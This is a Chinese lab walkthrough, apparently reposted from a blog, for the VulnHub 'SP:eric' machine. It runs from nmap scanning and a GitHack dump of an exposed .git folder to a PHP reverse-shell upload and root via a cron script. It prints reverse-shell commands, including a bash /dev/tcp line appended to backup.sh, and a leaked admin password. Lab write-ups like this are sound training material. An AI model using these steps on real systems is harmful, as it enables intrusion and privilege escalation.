当前位置:   article > 正文

SP:eric 靶场复现【附代码】(权限提升)

SP:eric 靶场复现【附代码】(权限提升)

靶机下载地址:

https://www.vulnhub.com/entry/sp-eric,274/icon-default.png?t=N7T8https://www.vulnhub.com/entry/sp-eric,274/

1. 主机发现+端口扫描+目录扫描+敏感信息获取

1.1. 主机发现

nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:75:19:80'

1.2. 端口扫描

nmap 192.168.7.104 -p- -A

1.3. 目录扫描

dirb http://192.168.7.104

1.4. 敏感信息获取

whatweb http://192.168.7.104

2. WEB网站漏洞挖掘

2.1. 进入http,80端口

主页面无发现

2.2. 拼接扫描出的目录

2.2.1. 拼接/.git/HEAD

1.尝试使用 githack 下载源码看看;

工具链接

https://github.com/lijiejie/GitHack

===================================================================

python2 GitHack.py -u http://192.168.7.104/.git/

2.查看下载下的文件,发现 admin.php 中存在一对账号密码

admin:st@mpch0rdt.ightiRu$glo0mappL3

2.2.2. 拼接/admin.php

1.发现是一个登录

2.尝试用刚才得到的账号密码登录一下 -> 成功登录

疑似存在文件上传漏洞

2.2.3. GetShell

1.存在文件上传

  1. locate php-reverse-shell.php
  2. cp /usr/share/webshells/php/php-reverse-shell.php .

2.修改 IP 和端口为kali及kali的监听端口;

  1. vim php-reverse-shell.php
  2. nc -lvnp 4444

3.将编辑好的.php文件,利用网页上传功能上传;

4.访问 /upload/php-reverse-shell.php,kali成功反弹

5.利用 python 生成更具交互性的交互shell界面

python3 -c 'import pty;pty.spawn("/bin/bash")'

老规矩 sudo -l 查看文件权限信息,但是需要密码

6.在 /home/eric 翻看文件 -> 存在三个可能可疑利用的文件

  1. cd /home/eric
  2. ls -al

先看 flag.txt 夺个旗;

  1. cat flag.txt
  2. >>> 89340a834323

查看 backup.sh 脚本文件;

cat backup.sh

查看一下计划任务

cat /etc/crontab

7.我们通过查看目录中的文件权限,已知 backup.sh 文件具有编辑权限;

打开kali监听,尝试写入反弹shell的语句 -> 成功提权

  1. nc -lvnp 5555
  2. echo 'bash -i >& /dev/tcp/192.168.7.36/5555 0>&1' >> backup.sh

声明:本文内容由网友自发贡献,转载请注明出处:【wpsshop】
推荐阅读
相关标签
  

闽ICP备14008679号